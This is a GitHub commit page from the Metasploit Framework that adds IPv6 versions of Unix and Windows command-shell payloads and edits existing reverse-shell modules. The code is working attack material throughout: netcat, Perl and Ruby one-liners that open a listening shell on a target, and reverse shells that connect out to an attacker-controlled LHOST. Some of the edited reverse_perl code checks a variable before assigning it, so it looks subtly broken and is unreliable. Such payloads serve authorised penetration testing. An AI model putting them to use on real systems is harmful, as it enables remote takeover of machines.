Skip to content

Commit

Permalink
Additional IPv6 payload support
Browse files Browse the repository at this point in the history
  • Loading branch information
HD Moore committed Dec 14, 2011
1 parent f6ef4ce commit 866e2b6
Show file tree
Hide file tree
Showing 7 changed files with 233 additions and 5 deletions.
57 changes: 57 additions & 0 deletions modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb
View file
@@ -0,0 +1,57 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell via netcat',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat-e',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end

#
# Constructs the payload
#
def generate
return super + command_string
end

#
# Returns the command string to use for execution
#
def command_string
"nc -6 -lp #{datastore['LPORT']} -e /bin/sh"
end

end
60 changes: 60 additions & 0 deletions modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
View file
@@ -0,0 +1,60 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via perl) IPv6',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell via perl',
'Author' => ['Samy <samy@samy.pl>', 'cazz'],
'License' => BSD_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end

#
# Constructs the payload
#
def generate
return super + command_string
end

#
# Returns the command string to use for execution
#
def command_string

cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"

return cmd
end

end
46 changes: 46 additions & 0 deletions modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
View file
@@ -0,0 +1,46 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via Ruby) IPv6',
'Version' => '$Revision$',
'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'ruby',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end

def generate
return super + command_string
end

def command_string
"ruby -rsocket -e 'exit if fork;s=TCPServer.new(\"::\",\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
end
end
5 changes: 4 additions & 1 deletion modules/payloads/singles/cmd/unix/reverse_perl.rb
View file
Expand Up @@ -51,7 +51,10 @@ def generate
# Returns the command string to use for execution
#
def command_string
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
end

end
4 changes: 3 additions & 1 deletion modules/payloads/singles/cmd/unix/reverse_ruby.rb
View file
Expand Up @@ -41,6 +41,8 @@ def generate
end

def command_string
"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{datastore['LHOST']}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
end
end
59 changes: 59 additions & 0 deletions modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
View file
@@ -0,0 +1,59 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions

def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Command Shell, Bind TCP (via perl) IPv6',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)',
'Author' => ['Samy <samy@samy.pl>', 'cazz', 'patrick'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end

#
# Constructs the payload
#
def generate
return super + command_string
end

#
# Returns the command string to use for execution
#
def command_string

cmd = "perl -MIO -e \"while($c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\""

return cmd
end

end
7 changes: 4 additions & 3 deletions modules/payloads/singles/cmd/windows/reverse_perl.rb
View file
Expand Up @@ -50,9 +50,10 @@ def generate
# Returns the command string to use for execution
#
def command_string

cmd = "perl -MIO -e \"$c=new IO::Socket::INET(PeerAddr,\\\"#{datastore['LHOST']}:#{datastore['LPORT']}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\""

ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
end

end

0 comments on commit 866e2b6

Please sign in to comment.